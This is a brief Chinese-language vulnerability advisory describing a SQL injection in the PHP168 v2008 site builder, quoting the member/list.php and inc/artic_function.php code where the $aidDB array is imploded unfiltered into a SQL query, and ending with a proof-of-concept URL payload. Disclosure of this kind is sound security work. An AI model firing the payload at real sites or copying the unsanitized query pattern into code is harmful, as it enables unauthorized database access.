Php168 v2008 list.php sql注入漏洞

PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用

在文件member/ list.php中:
if(!$aidDB)   //第127行
	{
		showerr("请至少选择一篇文章");
	}
……
if($Type=='delete'){    //第49行
		make_more_article_html("$FROMURL","del_0",$aidDB);
make_more_article_html函数在inc/artic_function.php文件中:
function make_more_article_html($comebackurl='/',$type='',$aidDB=''){  //第931行
	global $db,$pre,$webdb,$webdb;
	if($webdb[NewsMakeHtml]!=1||$aidDB=='')
	{
		return ;
	}
	$string=implode(",",$aidDB);
	$query = $db->query("SELECT A.*,B.bencandy_html,B.list_html FROM {$pre}article A LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE A.aid IN ($string)");
变量$aidDB没有过滤放入sql语句导致注入漏洞的产生
 
测试方法:
http://ssvdb.com/member/list.php?step=2&Type=delete&aidDB[]=1)%20and%201=2/*
发表评论?

0 条评论。

发表评论